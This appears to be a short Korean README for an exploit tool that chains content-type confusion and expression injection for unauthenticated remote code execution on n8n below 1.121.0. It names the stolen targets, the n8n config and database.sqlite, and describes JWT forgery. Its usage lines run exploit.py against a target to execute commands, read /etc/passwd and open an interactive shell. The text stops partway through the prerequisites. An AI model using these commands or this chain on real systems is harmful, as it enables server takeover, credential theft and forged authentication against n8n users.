
n8n에서 인증되지 않은 원격 코드 실행을 위한 익스플로잇 체인으로, 콘텐츠 유형 혼동과 표현식 주입을 결합하여 파일을 읽고, JWT를 위조하고, 명령을 실행합니다.
n8n < 1.121.0에 대한 인증 없는 RCE 체인 (CVSS 10.0)
/home/node/.n8n/config 및 database.sqlite 읽기child_process를 통한 명령 실행# 명령 실행
python3 exploit.py http://target:5678 /form/test --cmd "id"
# 파일 읽기
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# 대화형 셸
python3 exploit.py http://target:5678 /form/test
대상에는 다음이 포함된 활성 워크플로가 있어야 합니다: